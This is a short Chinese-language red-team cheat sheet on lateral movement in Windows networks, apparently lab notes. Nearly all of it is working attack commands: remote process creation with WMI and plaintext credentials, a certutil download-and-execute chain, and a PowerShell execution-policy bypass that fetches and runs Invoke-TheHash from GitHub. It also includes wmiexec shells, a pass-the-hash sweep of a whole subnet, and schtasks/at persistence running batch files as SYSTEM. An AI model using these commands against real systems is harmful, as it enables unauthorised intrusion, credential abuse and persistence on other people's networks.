SMB WMI
使用wmic查询远程主机进程信息:
wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process list brief
创建进程:
wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process call create "calc.exe"
下载文件并执行
wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process call create "cmd /c certutil.exe -urlcache -split -f http://10.60.18.18/test/putty.exe c:/windows/temp/putty3.exe & c:/windows/temp/putty3.exe"
使用powershell查看主机进程信息:
powershell -ep bypass
Get-WmiObject -Namespace "root\cimv2" -class Win32_process -Credential administrator -ComputerName 192.168.91.131
查看共享信息:
Get-WmiObject -Namespace "root\cimv2" -class Win32_share -Credential administrator -ComputerName 192.168.91.131
打开交互式shell:
python setup.py install
python wmiexec.py -share admin$ administrator:360College@192.168.111.51
使用HASH碰撞内网中其他机器:
powershell -ep bypass
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1');
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-TheHash.ps1');
Invoke-TheHash -Type WMIExec -Target 192.168.111.0/24 -Domain rootkit -Username administrator -Hash 7c70a81c7c5882c24298d391fd397885
计划任务
ipc
net use \\192.168.91.131\IPC$ /user:"administrator" "ABCabc123"
copy C:\Users\qianxiao996\Desktop\putty.exe \\192.168.91.131\c$
schtasks
schtasks /create /s 192.168.91.131 /u Administrator /p ABCabc123 /ru "SYSTEM" /tn CMDNAME /sc DAILY /st 22:18 /tr C:\\Users\\qianxiao996\\Desktop\\sha\\cmd.bat /F
at
at \\192.168.91.131 19:30 /every:5,6,7,10,18,19,21,24,28 c:\windows\temp\cmd.bat